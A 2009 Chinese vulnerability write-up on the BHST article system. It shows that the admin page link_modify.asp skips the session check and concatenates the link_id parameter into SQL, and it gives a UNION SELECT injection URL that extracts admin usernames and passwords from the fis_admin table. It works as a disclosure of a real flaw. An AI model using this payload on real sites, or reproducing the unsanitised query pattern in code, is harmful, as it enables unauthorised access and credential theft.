BHST文章系统漏洞

2009/6/24 来源:www.arpun.com 作者:小白

作者:Jshell

Blog:http://www.jshell.cn

发布于鸡拔毛IT潮人社区

http://www.jbmao.com

首先说下作者在程序中代码的顺序错误

<!--#include file="../conn.asp"-->

<%

if session("adminuser")="" then

  response.Redirect("login.asp")

end if

%>

<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>

这样一句好像是多此一举 而且位置放错了 程序使用的是vbscript 默认的

不要这句的 而且这句只能放在代码的最顶端吧

漏洞出现在 fis/login/link_modify.asp 里 看了下后台文件 大都有

session的验证 唯独这里没有 再看下代码:

<%

linkid=request("link_id")

if linkid<>"" then

set linkrs=server.CreateObject("adodb.recordset")

sqllink="select * from fis_links where link_id="& linkid

linkrs.open sqllink,conn,1,3

%>

典型的不能再典型的注入了 打开表 link_id 数了下一共6个字段 在页面上有

字段内容的rs输出 所以我们使用联合查询直接爆喽

http://127.0.0.1/fis/login/link_ ... 0union%20select%201,admin_name,admin_pass,4,5,6%20from%20fis_admin

如下图:

/article/UploadFiles/200906/20090624081059382.jpg

 

网友评论
评论(...
全部评论